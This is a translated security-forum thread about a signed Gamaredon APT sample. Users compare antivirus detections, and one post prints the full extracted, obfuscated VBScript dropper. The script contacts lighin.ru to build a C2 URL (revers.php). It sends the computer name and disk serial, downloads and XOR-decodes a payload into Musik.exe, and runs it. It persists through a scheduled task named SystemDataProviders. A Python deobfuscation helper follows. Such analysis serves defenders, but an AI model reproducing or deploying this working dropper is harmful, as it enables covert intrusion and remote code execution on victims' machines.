Original poster: hsks

[Virus sample] #Gamaredon #APT #Signed

846472713
Posted on 2021-7-9 19:48:03
cylance

正在缓冲
Posted on 2021-7-9 19:48:17
Shake2333 posted on 2021-7-9 19:21
McAfee miss; it cannot be run by double-clicking

In the VT results in post #9, McAfee detected it
ANY.LNK
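Posted on 2021-7-9 19:58:55
The program is not run by double-clicking; please execute (this file) with the mshta command.
A VBS script is embedded at the tail end, and there are also several modifications earlier in the file.
The extracted VBS script: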
  1.                 <html>
  2. <body>
  3. <script language="VBScript">
  4. On Error Resume Next
  5. if SKFGDCaWBDAoqQHbpnff < 11 then tnPyM = "OOzlQEPEhqxKjvYH"
  6. Set TjyjpMbVrYKdg = CreateObject("WS" & "cr" & "ip" & "t." & "Sh" & "el" & "l")
  7. if VgGVHa = 47 then bxewmQphqiGT = "kDtFTjIsRfUiiEqkljQbgqZSk"
  8. Set ngAnTVImteBoEho = CreateObject("Sc" & "ri" & "pt" & "in" & "g." & "Fi" & "le" & "Sy" & "st" & "em" & "Ob" & "je" & "ct")
  9. if bUxXmpBwTaRTNYVw = 20 then QxKapgnaexUMxv = "zkvpUYteCJdPRdibaevJiDloKwH"
  10. Set lAmnIxntyY = CreateObject("W" & "S" & "c" & "r" & "i" & "p" & "t" & "." & "N" & "e" & "t" & "w" & "o" & "r" & "k")
  11. if XQBxSozHoPuAUZDFC < 17 then EmmnGdoxBeGURoTah = "iEsDQU"
  12. MZkTAfMiw = Hex(ngAnTVImteBoEho.GetDrive(TjyjpMbVrYKdg.ExpandEnvironmentStrings("%S" & "YS" & "TE" & "MD" & "RI" & "VE" & "%")).SerialNumber)
  13. if WSTJwgHiLOAtyhxQeZ = "NofmqGwMjLvLYuq" then
  14. FiOApOKYCTsmqhlXRq = UCase("AHRevlHEOSbKMMJf")
  15. for LvZwYusBbMG = 36 to 275
  16. UrzalQAM = Trim("aXXemAWBQlIivgDiXmtKvxGxjKlbtfNwkNyYBPFBE")
  17. if WMJDthicaaQmdRaubPuIk = "GrtLCnWTbVHaVemKCFyBKWLCB" then
  18. LyhhegHgsGkGkk = UCase("thKBWhpTUXAwikpfFMXFmBFvhAljQk")
  19. if KhtoIazZlBJOJFXNLfQze = "mbdYXkTfMPyBMuFeefyZ" then isbOUVvFDksJmBrAWfMxUks = "ATWVLJknhayzk"
  20. end if
  21. Next
  22. end if
  23. CkaZbHTLxRSgwxKJmurCOt = TjyjpMbVrYKdg.ExpandEnvironmentStrings("%CO" & "MPU" & "TER" & "NAM" & "E%") & "_" & MZkTAfMiw
  24. if xihsXOPgaxzW = "lgAX" then
  25. fYYaOHevNVHFrwuS = UCase("nRTfgrrZJWbRAWlKlZlYkN")
  26. for gRVNYMTVHSlGGjanDnL = 90 to 209
  27. eZwXhsAHPzcargyOWeB = Trim("KileDByyUxBpIHV")
  28. if gLLGIqLOZkMQZmOgY = 13 then OmDoyJReeY = "rtYyUlrzCrZPdQmhuL"
  29. Next
  30. end if
  31. rWxIp = "num="+CkaZbHTLxRSgwxKJmurCOt+"&vr=hta"
  32. for TBQgvsJEgojkNdmL = 51 to 231
  33. EFTvsuXExU = Trim("ScsjafNZtLqKHBqAVhRiDVUGiaHtcxYhtDWHs")
  34. for HxnLud = 16 to 246
  35. lsgEcnJdYwIlBzYUxvn = Trim("fjHreKkPKZcwo")
  36. if YUlXPeZzG = "JmiIEKJHZaBkBYGkAPabGYuSHcGBPbjcYVVnQxXsZ" then
  37. DjdqPHVUiNxwlIz = UCase("RoFlSJGNvWiXmkrPBcEIsxrZLfDTTD")
  38. if ClHGNWKxuCgMuAjkvA = 24 then uoQdUwgZmFntsezVBdkCfRG = "QeeKwSXSHwtlImJgwXrGIoiufiH"
  39. end if
  40. Next
  41. Next
  42. DIcSCqKCCVIp = TjyjpMbVrYKdg.ExpandEnvironmentStrings("%PU" & "BL" & "IC%") + "\Do" & "wn" & "lo" & "ad" & "s\M" & "u" & "s" & "i" & "k.hta"
  43. if hYNkd = 12 then OHzOc = "hdZRKCtI"
  44. cSWDxPyCtzNMFZOFFG = TjyjpMbVrYKdg.ExpandEnvironmentStrings("%PU" & "BL" & "IC%") + "\Do" & "wn" & "lo" & "ad" & "s\M" & "u" & "s" & "i" & "k.ini"
  45. if EtytFGQRFvs = "tyAuJIhWibxLwVHRraXOSTZ" then
  46. jAzmOLtCLQx = UCase("TomTqLGovZAHGWHxOWjIDopsDbLksjGaZWaVVN")
  47. if UIPXVALUSaAwk = "hjwmbArMouYSXDQq" then ZfyuPPAWvMT = "SjKpIxvWbyQ"
  48. end if
  49. lbBJUBMA = TjyjpMbVrYKdg.ExpandEnvironmentStrings("%PU" & "BL" & "IC%") + "\Do" & "wn" & "lo" & "ad" & "s\M" & "u" & "s" & "i" & "k.exe"
  50. if pXRyxehmwlRtcIrTKuETsT < 14 then ZuQIevzvU = "zvTVlaktVDZMJJUaYfpq"
  51. for fcoejbREFiD = 81 to 257
  52. NcmXAYbjXMGCXC = Trim("WsVWYRxxfMYXDYBvavXwjzltrtSVlGhiwei")
  53. if BpLoZUMDLTnFGwGVY = 38 then XGcffybMYepbZpLOZGMHK = "pgZfQeJaNXnLiFVJMN"
  54. Next
  55. Set kdEdBOevrfbtM = GetObject("win" & "mgm" & "ts:" & "{im" & "per" & "son" & "ati" & "onL" & "eve" & "l=i" & "mpe" & "rso" & "nat" & "e}/" & "/" & lAmnIxntyY.ComputerName & "/" & "r" & "o" & "o" & "t" & "/" & "c" & "i" & "m" & "v" & "2").ExecQuery("SELECT * FROM Win32_PingStatus WHERE Address = 'lighin.ru'")
  56. if RjTEIXkLrKBa < 16 then ouceWwgLbqfsGrQANoQ = "FCSVwjVHJH"
  57. For Each YErAyWXXMEGKFtWyokgja In kdEdBOevrfbtM
  58. If YErAyWXXMEGKFtWyokgja.StatusCode = 0 Then
  59. DAPMal = "htt" & "p:/" & "/" + YErAyWXXMEGKFtWyokgja.ProtocolAddress + "/revers.php?id="
  60. End If
  61. Next
  62. if SiJOyd = "kfsvprXRDWJexDCnQPzEHQSifz" then
  63. uOXgvGQJeJtECwfkk = UCase("IIHnyYmOxnzYfJeCtAALqBPgPlgUTNKPqLOJwiLF")
  64. if EARrTvdOYifnpGtbYMsS = "kDVHQVKzMtuUXhJzAIINukmpJe" then
  65. kcjhUuUGLouAAxOPYRkrFo = UCase("AvIbpvAzeynEkBpiHFdrh")
  66. if jiwbizQfxlI = "NDX" then
  67. EERFYWie = UCase("FCfkgmeldYssTSzOSpTbr")
  68. if pzEUzkRWfZPdwkvR = "MSDpCdXXUxT" then eYafZNEEiQhXkvUUYpkbSfBM = "yPmAPQTj"
  69. end if
  70. end if
  71. end if
  72. if iTJxeAVsCBRhyFJQRSkw < 17 then fajZYxmOncjMQb = "pdRNkWdlBqekirWqIRCtaXG"
  73. CreateObject("S" & "h" & "e" & "l" & "l" & "." & "A" & "p" & "p" & "l" & "i" & "c" & "a" & "t" & "i" & "o" & "n").ShellExecute "SC" & "HT" & "AS" & "KS", "/CR" & "EAT" & "E /" & "sc " & "min" & "ute" & " /m" & "o 7 /tn ""S" & "y" & "s" & "t" & "e" & "m" & "D" & "a" & "t" & "a" & "P" & "r" & "o" & "v" & "i" & "d" & "e" & "r" & "s"" /tr " + DIcSCqKCCVIp + " /F","","",0
  74. if RXNeGGEDfJACP = "USoQiGywKRFDhCttsYSzQ" then gXZetvczYkf = "ZUeVenuSyczIllPOau"
  75. for xXvxaKCIYnkLLyJT = 8 to 279
  76. wrvcNStRMwpRYau = Trim("ukkPjRdpoaqh")
  77. if kxUPjBkFBfNN = "gIdyXeTbfcXhbFeUbRpjECVFnpbkizXDBGnHGCN" then
  78. qzNpHhwOi = UCase("hEilpJYHKnGeZzmenXLhDjsfFTfURXNZEPB")
  79. if kQdRTZvtseCU < 19 then UirfXyMC = "eDpnZgaKylLCH"
  80. end if
  81. Next
  82. Set AQtbgUKu = GetObject("winmgmts://" & "." & "/" & "r" & "o" & "o" & "t" & "/" & "c" & "i" & "m" & "v" & "2")
  83. if PorYMbkVwqaqOgYuOy = "VbbF" then
  84. rIVzLdSRiHUpyyVzkIL = UCase("nanbLJDPpVatogvtJBOcAcstgolCwPPgQPXCfqXxQaJcv")
  85. if bQILZMdjLiuuWXBTZFtdZIs < 11 then TeQLaSPxas = "nDqTmfMUlvAZPGjXCcW"
  86. end if
  87. For Each TzWsvMeUOvnpKbgQx In AQtbgUKu.ExecQuery("SE" & "LE" & "CT" & " N" & "am" & "e " & "FR" & "OM" & " W" & "in" & "32" & "_P" & "ro" & "ce" & "ss" & " W" & "HE" & "RE" & " N" & "am" & "e='M" & "u" & "s" & "i" & "k.exe'")
  88. TzWsvMeUOvnpKbgQx.Terminate
  89. Next
  90. if pJbAWIWBmLTBW < 12 then bXnwIewsWkTLsT = "qfSygLYoFNqyoBo"
  91. if UvsvnX = 40 then wSXrZiYhIuxnJcgzrsN = "ghMmbtSvoOcfEPCRrxIsR"
  92. oNLieMQRBwxVFJkylrChN = Int((10000 * Rnd) + 1)
  93. if nMqmOl = 43 then SfznKBnxASHmzTmfWPct = "JOBIVEtZyvTKW"
  94. If ngAnTVImteBoEho.FileExists(cSWDxPyCtzNMFZOFFG) Then ngAnTVImteBoEho.DeleteFile(cSWDxPyCtzNMFZOFFG)
  95. if pwLtqtKZbBxn = "FopoddbSdDYxwnvfsUsBqieGruaXnXPGYvIwNXcyh" then
  96. OkDMGbJcGSEBvTmlDmrP = UCase("dOgEzfrGKRyNCWJjxiC")
  97. if FoRYBeyRUruUhFPZ < 13 then vufhMxHKsmmeauvdfXa = "yAsoqZEtVRtJLmIYw"
  98. end if
  99. If ngAnTVImteBoEho.FileExists(lbBJUBMA) Then cAzqcAZTaAo = TjyjpMbVrYKdg.run (lbBJUBMA,0,true)
  100. for RepLmUCEEoIl = 73 to 260
  101. qavyODl = Trim("TZSeISAVDkOlRnuQzgAu")
  102. if cfNwWHihleuTVmUqu = "wsmWyjqxRIvIl" then
  103. ETEBsFIIEyEFnbtnwmQ = UCase("qxbbnHnNCjdfrTZiphZhoLgi")
  104. if PKqwCvTX < 17 then wLUzIYipDtSrWYjSOjE = "RtZesdXGghMTidWV"
  105. end if
  106. Next
  107. If ngAnTVImteBoEho.FileExists(lbBJUBMA) Then ngAnTVImteBoEho.DeleteFile(lbBJUBMA)
  108. if aWgaNUuzWulbcueGq = "anBaKormXDYLsPhFhpSALjWbqDnvcBEljwApt" then
  109. HiKzfdmSssvlL = UCase("wBeULHaUlXkmL")
  110. if LcqQakHAvJVz < 14 then cvOsMetQVqYOAWSPLpqy = "TKYTTpBiLqInrp"
  111. end if
  112. if GlvNj = "AFDynoWyurOAwkndchbFa" then fPDVOFVuM = "WnljnptMSTsZfQFoOR"
  113. for TJrdNeqGPUHHjeAlBLgp = 29 to 328
  114. JRirkSCWvPLNpUI = Trim("FZHpfYyyuuWWtpiNJ")
  115. if lcLojUFw = 21 then tJsVGDbQTUlJtmYHAYVVfc = "GJeukXUacEEkCA"
  116. Next
  117. jTIJzzAlwtn ()
  118. if TCIybjnDUzidTIekZbIaTfx = 16 then BfOoQZclfMmPfJcElngrEI = "pfHKoPcoEOwvUymvXxyG"
  119. If ngAnTVImteBoEho.FileExists(cSWDxPyCtzNMFZOFFG) Then
  120. vgPeCOds = TfUBrsmBeQpQzHR("" + MZkTAfMiw + "")
  121. bkQNIcHOu = fTQnMRvTK( "" + cSWDxPyCtzNMFZOFFG + "", "" + lbBJUBMA + "", vgPeCOds )
  122. End If
  123. if KzGZbrM = "TCfMljiZfZJZFMqnHL" then
  124. ZwqzYDWiyCdFAiWYEnD = UCase("IKBoyIOGcdiUnnuRXRdNpUxCZtEAoriQtuuHSOgEWcGvxFVmLuSWd")
  125. if oMyPED = 44 then SkuRbtsmyJ = "rMOBFTYSptZMmwqGvU"
  126. end if
  127. For Each TzWsvMeUOvnpKbgQx In AQtbgUKu.ExecQuery("SE" & "LE" & "CT" & " N" & "am" & "e " & "FR" & "OM" & " W" & "in" & "32" & "_P" & "ro" & "ce" & "ss" & " W" & "HE" & "RE" & " N" & "am" & "e='mshta.exe'")
  128. TzWsvMeUOvnpKbgQx.Terminate
  129. Next
  130. if ByYHhRydfVoh = "DFHDGMKAThhYrXRjfSxDULzZHzLBcHRLFJVBZ" then
  131. TEkNHctHw = UCase("rQUVUzcvMMvYwaKsUsGivHA")
  132. if LQWTiCQJRbhjyq < 11 then wMmyGDKqAMocvrSjPLxJjGbe = "OfzdJVCGmiVBCTAa"
  133. end if
  134. if cDPWYGGPXE = "gzn" then
  135. szjMSyDxJmB = UCase("mSJjckSeIWywjpipIKlVzlkcwjCcbDiXlgU")
  136. if UoIgEDvzGN = 42 then DLrWNRaAhhmt = "DFoaLDVmcoWdouhpcpWiYPLMKTF"
  137. end if
  138. for NFfJCMxunxXhem = 45 to 288
  139. KCBLPKIlPpBXzAUUEb = Trim("CtsznNrKptMnSLYjMMPEUQTAoxtSdSFFFFIIJL")
  140. for QaZwpkhpwksOJbIlarKpTYh = 41 to 230
  141. nGhMCQZAkRntr = Trim("PDWsaqwewXhSAm")
  142. for tCJiCUmfKrernPuDgGZQBo = 77 to 292
  143. wKDPfiHAyovApNcBvQrhjME = Trim("dluMNqEFMYzFHxDrgDsPFqDEezKHMkGNhCEVF")
  144. if EvjBDBpJtesgBxS = "hlubnTWpzCpqQcUDFPPf" then niphNgxtcSmXE = "nQENYxqYlPS"
  145. Next
  146. Next
  147. Next
  148. for IgKPln = 18 to 270
  149. FFlVCMoSwH = Trim("TvUWKfCfXDDXGahXyWTEdWLzxNieWrcwpglMMoFFkiiCiywmGuxkpVVwkU")
  150. for xXIfaGhaoULKROTuoJRzRvX = 49 to 245
  151. urGUKocsPIHMZCb = Trim("yljnTbBaIbCZfCAhljAMPzsSvJGGVl")
  152. if ivxmrGXfSkgBppcFMrRsa = "vFXuLrjFNqeLVue" then GytQsK = "rdFgAtdUoQep"
  153. Next
  154. Next
  155. for nOVBxEhRXoGQpJZR = 66 to 255
  156. mBYyysVOBkExrSIAJ = Trim("leOkWGCNqLMYTLtkEdpVAnvUdUfVxPgY")
  157. if wImocrqHXqXgegZXvfvzXy < 23 then tHCagQafnTZOlxQBxe = "ExwpzwZUAdF"
  158. Next
  159. Function jTIJzzAlwtn()
  160. if aAphZzBBbVxBQzePlibb = "rVPlLAJOvkuyJYavWoAJNmlYFemY" then
  161. brRHdcMASILPsuAdMojjfh = UCase("rsOtNalOrBAItPfxvqFmsNvfYQFjrfhNkUDsG{过}F{滤}WxohfnAATWGaKnhm")
  162. if xjVwUBWLTnYZLmQq < 11 then HxLiHeXxidRVtfxSZvxjzcm = "TMctKTJUsapq"
  163. end if
  164. On Error Resume Next
  165. if ypZBSeKlZU = "InT" then
  166. ovtluMuQAhQnCKdlvEHkFc = UCase("iINqRtDHjwvGZ")
  167. if OghBWrotPgSjpLul < 13 then bILImqztzCuozyidbOUalwMu = "KyKOvoLyfQvVbpiIXouEPik"
  168. end if
  169. Set bPwWH = CreateObject("MS" & "XM" & "L2" & ".X" & "ML" & "HT" & "TP")
  170. if WRjEElf = "smShDvyNrjEwtAWvy" then JsdPSwCexVKEorLiTMv = "wWWdNaIeQfFAksqAsXavLXxpmOQO"
  171. Set bTcEQqiA = CreateObject("ADO" & "DB." & "Str" & "eam")
  172. if KuUcKpQQdRqdzjXmtehwQDIQ = 43 then VvifpzcYZgdEBJSah = "DdzmeBguyuiGmEvothlnROFZCt"
  173. bPwWH.Open "POST", DAPMal + CStr(oNLieMQRBwxVFJkylrChN), False
  174. for klToYiYAmSqrRk = 45 to 289
  175. GdMkbjbBhlAqdmXx = Trim("ZSKVgvFqoZJOCnOpTKEvqIjmCYsvOOVSLVLLwHgoWtncXXxDOwEnTkFQ")
  176. if THDKbZErDhcCtL = "cXoYlMRNXgUQaLCtJELI" then PZxUHOeaogRJiyaP = "cJohOdJQWscRhaWWFdNfHjiKKOU"
  177. Next
  178. bPwWH.setRequestHeader "C" & "o" & "n" & "t" & "e" & "n" & "t" & "-" & "T" & "y" & "p" & "e", "ap" & "pl" & "ic" & "at" & "io" & "n/" & "x-" & "ww" & "w-" & "fo" & "rm" & "-u" & "rl" & "en" & "co" & "de" & "d"
  179. for HlVTXZNw = 1 to 317
  180. odpKLX = Trim("TGfLgLMfZLHdfwfYTWAtiEJNdHoVK")
  181. for sdzxYevFJ = 18 to 304
  182. sABpaIg = Trim("BzwlOwShYWrVBBOzgyHuXQqmqEHYDyILYfJtgNjbMNgmQXyAaach")
  183. if UkIKvKoteaOfwVrVTTPgh < 15 then kEVSGGxd = "JgLZkWRZmSjGXka"
  184. Next
  185. Next
  186. bPwWH.setRequestHeader "Con" & "ten" & "t-L" & "eng" & "th", Len(rWxIp)
  187. if LEfLbQCHdDuVTD < 10 then CiPIyOut = "CsubiCOddTnAVSspylK"
  188. bPwWH.Send rWxIp
  189. if IjfVcEbhujL < 20 then RCcbxtUgSqJvb = "xtbWnyv"
  190. If bPwWH.Status = 200 Then
  191. bTcEQqiA.Open
  192. bTcEQqiA.Type = 1
  193. bTcEQqiA.Position = 0
  194. bTcEQqiA.Write bPwWH.ResponseBody
  195. bTcEQqiA.SaveToFile cSWDxPyCtzNMFZOFFG
  196. bTcEQqiA.Close
  197. End If
  198. End Function
  199. if XVuAgvxBzUoraH = "BKJCTDJhEwwDmttTGtcceiJljbaVGugBWEzWlu" then
  200. XDSMSsWz = UCase("vKGneKHlJZsMytWLTBXSscobKQvghuXhLMgRXvebcq")
  201. if NhhIztgUNbpTWfcOPaDPCKA = "WNurSPMBnBtCguwtFIxSloIeSzgctOBzq" then
  202. MFoXXvqBLsNcimgoOCU = UCase("QzLwEIjoNKyKwnqnjFEByiFQYT")
  203. if HZztMPexiIDpiwaxfI = "ShtvXlZzhoKEygItEaC" then smGfvv = "TBHHkQQqxA"
  204. end if
  205. end if
  206. if aEpYoKnRBDenoWHiANY = 37 then mOARz = "UEjBlkhJhifxFVOkcadL"
  207. Function TfUBrsmBeQpQzHR( TjyjpMbVrYKdg )
  208. On Error Resume Next
  209. Dim vbUwYQgMnnOpvzKXfeJj, ByNLbsVc( )
  210. ReDim ByNLbsVc( Len( TjyjpMbVrYKdg ) - 1 )
  211. For vbUwYQgMnnOpvzKXfeJj = 0 To UBound( ByNLbsVc )
  212. ByNLbsVc(vbUwYQgMnnOpvzKXfeJj) = Asc( Mid( TjyjpMbVrYKdg, vbUwYQgMnnOpvzKXfeJj + 1, 1 ) )
  213. Next
  214. TfUBrsmBeQpQzHR = ByNLbsVc
  215. End Function
  216. for WQyALmgDqhxcKGlXDBSah = 33 to 204
  217. EQutcEOObggfCvi = Trim("[过滤]ZPxpOfvcWMxKvLhGRKbpbFRwfEpokzmErNfBw")
  218. if ZSmFUiVGjA < 11 then kVtAmTyBK = "GrXZtSiggJNvCWoAwNJx"
  219. Next
  220. if dsAHsrBtba = "SPNdcdFbARQSrP" then
  221. GaQiqpBhZTDAAQsngyw = UCase("hIUdgrJuuarArADUufMTrMmFN")
  222. if gHCkJkzLeLVPWIV = "WPQxRcmrpiProZJ" then DldObxwVmewZ = "PqKWtjUjVyjLhxe"
  223. end if
  224. for lmIRVymGpGaaaBGPJQcKe = 60 to 332
  225. hCZROXs = Trim("xGBreAATjqXFyKAowIHE")
  226. for LeFGrDkPOI = 17 to 273
  227. OdTAOlIP = Trim("jcDORZbkZrmjuWmYIwjUcPujhgohWyoPmYudCdmKneiSctYd")
  228. for zSZGLUhUg = 13 to 311
  229. kuNaCXxWcJVfKYgygc = Trim("LEKzVpfNZvixCatQHP")
  230. if BATrUIBZMnENrcYpDbhhRJC < 10 then niHynhZMBt = "lTeNoFAmr"
  231. Next
  232. Next
  233. Next
  234. Function fTQnMRvTK( gXUpDybxQDfD, PgPomDAtGBdLIEMVE, ByNLbsVc )
  235. On Error Resume Next
  236. Dim isEpnMuqtZZWqeuuPcMgeoRE, wiHlwSZ, gdPAWhrcKVrl, bbkXoy, AStbAirdmExG
  237. If Not IsArray( ByNLbsVc ) Then
  238. ByNLbsVc = Array( ByNLbsVc )
  239. End If
  240. For isEpnMuqtZZWqeuuPcMgeoRE = 0 _
  241. To UBound( ByNLbsVc )
  242. If Not IsNumeric( ByNLbsVc(isEpnMuqtZZWqeuuPcMgeoRE) ) Then
  243. fTQnMRvTK = 1032
  244. Exit Function
  245. End If
  246. If ByNLbsVc(isEpnMuqtZZWqeuuPcMgeoRE) < 0 _
  247. Or ByNLbsVc(isEpnMuqtZZWqeuuPcMgeoRE) > 255 Then
  248. fTQnMRvTK = 1031
  249. Exit Function
  250. End If
  251. Next
  252. Set wiHlwSZ = CreateObject("Sc" & "ri" & "pt" & "in" & "g." & "Fi" & "le" & "Sy" & "st" & "em" & "Ob" & "je" & "ct")
  253. If wiHlwSZ.FileExists( gXUpDybxQDfD ) Then
  254. Set gdPAWhrcKVrl = wiHlwSZ.GetFile( gXUpDybxQDfD )
  255. Set AStbAirdmExG = gdPAWhrcKVrl.OpenAsTextStream( 1, 0 )
  256. Else
  257. AStbAirdmExG.Close
  258. Set AStbAirdmExG=Nothing
  259. Set gdPAWhrcKVrl=Nothing
  260. Set wiHlwSZ=Nothing
  261. Exit Function
  262. End If
  263. If wiHlwSZ.FileExists( PgPomDAtGBdLIEMVE ) Then
  264. AStbAirdmExG.Close
  265. Set AStbAirdmExG=Nothing
  266. Set gdPAWhrcKVrl=Nothing
  267. Set wiHlwSZ=Nothing
  268. Exit Function
  269. Else
  270. Set bbkXoy = wiHlwSZ.CreateTextFile( PgPomDAtGBdLIEMVE, True, False )
  271. End If
  272. set isEpnMuqtZZWqeuuPcMgeoRE = 0
  273. Do Until AStbAirdmExG.AtEndOfStream
  274. For isEpnMuqtZZWqeuuPcMgeoRE = 0 _
  275. To UBound( ByNLbsVc )
  276. isEpnMuqtZZWqeuuPcMgeoRE + 1 mod ( UBound( ByNLbsVc ))
  277. bbkXoy.Write Chr( Asc( AStbAirdmExG.Read( 1 ) ) _
  278. Xor ByNLbsVc(isEpnMuqtZZWqeuuPcMgeoRE) )
  279. if AStbAirdmExG.AtEndOfStream Then Exit Do
  280. Next
  281. Loop
  282. set isEpnMuqtZZWqeuuPcMgeoRE = 0
  283. Do Until AStbAirdmExG.AtEndOfStream
  284. isEpnMuqtZZWqeuuPcMgeoRE = ( isEpnMuqtZZWqeuuPcMgeoRE + 1 ) \ ( UBound( ByNLbsVc ) + 1 )
  285. bbkXoy.Write Chr( Asc( AStbAirdmExG.Read( 1 ) ) _
  286. Xor ByNLbsVc(SioGH) )
  287. vbUwYQgMnnOpvzKXfeJj = vbUwYQgMnnOpvzKXfeJj + 1
  288. If SioGH < UBound( ByNLbsVc ) Then
  289. SioGH = SioGH + 1
  290. else SioGH = 0
  291. End If
  292. Loop
  293. bbkXoy.Close
  294. AStbAirdmExG.Close
  295. Set AStbAirdmExG=Nothing
  296. Set gdPAWhrcKVrl=Nothing
  297. Set bbkXoy=Nothing
  298. Set wiHlwSZ=Nothing
  299. End Function
  300. if MensyQSKyhmcWesVPeZc = 45 then mfyeVLkgIeXjoixuzfBss = "lVQvOJqqATzZzpNdEidqCOthvvaQy"
  301. if arbkCYPcEYpNGYOrds = "kicheHxHWeeypMVMxvALTSXmXBYLSiRwyFCP" then
  302. xVdwbYiFrqgWQBoqwvf = UCase("wSTbajNLigDfbtBuUTSKpJcjlpoMizkKGTAcgjtiKapUVfqoQBelk")
  303. if mpkqkv < 10 then diwtY = "YOkZjzPUHNFzzwgVyZBPO"
  304. end if
  305. if tbIjoRGVCuFQVDykkUsyDlKu < 25 then RhgsiuEhSVHdPcl = "asTfGtGoYCyIwH"
  306. if WNqQFEAXuFrSwD < 21 then OiCKsHQwz = "MxAZKJvKfUB"
  307. </script>
  308. </body>
  309. </html>

Rating

Participants: 1, popularity +3
hsks +3, reason: Thanks for the answer : )
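The string splitting and dead-code padding in the script posted above can be undone statically, without executing the sample. The Python below is an added example, not part of the original post: the padding patterns are heuristics read off this sample, and `SAMPLE` holds a few statements from the script with variable names shortened.

```python
import re

LIT = r'"(?:[^"]|"")*"'              # one VBScript literal; "" is an escaped quote
JOIN = re.compile(r'\s*[&+]\s*')     # operator sitting between two literals
# Padding shapes read off this sample (heuristics, not a VBScript parser):
JUNK_LINE = re.compile(              # one-line dead `if`, or Trim/UCase filler
    rf'if \w+ [<=] (\d+|{LIT}) then \w+ = {LIT}|\w+ = (ucase|trim)\({LIT}\)', re.I)
JUNK_OPEN = re.compile(              # dead `if` block, or `for` over constant bounds
    rf'if \w+ [<=] (\d+|{LIT}) then|for \w+ = \d+ to \d+', re.I)

def fold_strings(line):
    """Merge literals that are joined only by & or + into one literal."""
    parts = re.split(f'({LIT})', line)       # odd indexes hold the literals
    out = [parts[0]]
    for lit, gap in zip(parts[1::2], parts[2::2]):
        if len(out) > 1 and JOIN.fullmatch(out[-1]):
            out.pop()                        # drop the operator
            lit = out.pop()[:-1] + lit[1:]   # glue onto the previous literal
        out += [lit, gap]
    return ''.join(out)

def strip_junk(lines):
    """Drop padding, pairing every Next/End If/Loop with its opener."""
    kept, stack = [], []                     # True = real block, False = padding
    for line in (l.strip() for l in lines):
        low = line.lower()
        if not line or JUNK_LINE.fullmatch(line):
            continue
        if JUNK_OPEN.fullmatch(line):
            stack.append(False)
            continue
        if low.startswith(('for ', 'do ')) or (low.startswith('if ') and low.endswith(' then')):
            stack.append(True)
        elif low in ('next', 'end if', 'loop') and stack and not stack.pop():
            continue                         # closer of a padding block
        kept.append(line)
    return kept

def deobfuscate(text):
    text = re.sub(r'[ \t]_[ \t]*\r?\n\s*', ' ', text)   # join `_` continuations
    return [fold_strings(l) for l in strip_junk(text.splitlines())]

# Statements taken from the posted script, variable names shortened for the example.
SAMPLE = r'''if junkA < 11 then junkB = "OOzlQEPEhqxKjvYH"
Set sh = CreateObject("WS" & "cr" & "ip" & "t." & "Sh" & "el" & "l")
if junkC = "lgAX" then
for junkE = 90 to 209
junkF = Trim("KileDByyUxBpIHV")
Next
end if
hta = sh.ExpandEnvironmentStrings("%PU" & "BL" & "IC%") + "\Do" & "wn" & "lo" & "ad" & "s\M" & "u" & "s" & "i" & "k.hta"
If r.StatusCode = 0 Then
url = "htt" & "p:/" & "/" + r.ProtocolAddress + "/revers.php?id="
End If'''
```

To run it over the full listing, strip the forum's `N.` line-number prefixes first.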

BE_HC
Posted on 2021-7-9 20:03:00

Maybe it's because I reported it?

On my side, the Guard (卫士) still doesn't flag it
Shake2333
Posted on 2021-7-9 20:04:27
正在缓冲 posted on 2021-7-9 19:48
In the VT results in post #9, McAfee detected it

Mine still doesn't flag it
正在缓冲
Posted on 2021-7-9 20:06:21

Update the virus definitions?
Looks like McAfee is the same as Microsoft Defender: whether it flags something depends on the program's mood
00006666
Posted on 2021-7-9 20:19:28
BE_HC posted on 2021-7-9 20:03
Maybe it's because I reported it?

On my side, the Guard (卫士) still doesn't flag it

360 Total Security


anthonyqian
Posted on 2021-7-9 20:32:18
Last edited by anthonyqian on 2021-7-10 12:07

BD does not detect it; BD does detect the VBS file
Now the exe is detected too
Shake2333
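Posted on 2021-7-9 20:49:51
正在缓冲 posted on 2021-7-9 20:06
Update the virus definitions?
Looks like McAfee is the same as Microsoft Defender: whether it flags something depends on the program's mood

Not flagged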

心醉咖啡
Posted on 2021-7-9 21:16:07
Duba (毒霸) scan: miss